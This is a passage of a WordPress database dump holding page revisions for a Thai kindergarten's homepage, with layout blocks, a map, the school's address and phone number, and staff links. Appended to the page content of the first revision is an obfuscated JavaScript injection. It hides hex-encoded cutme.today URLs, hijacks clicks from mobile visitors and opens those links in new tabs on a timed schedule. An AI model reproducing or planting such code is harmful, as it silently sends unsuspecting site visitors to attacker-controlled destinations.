{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-23 14:50:09','2024-08-23 07:50:09','',19,'http://watprato.ssk.in.th/?p=212',0,'revision','',0),
(213,2,'2024-08-26 15:56:05','2024-08-26 08:56:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span 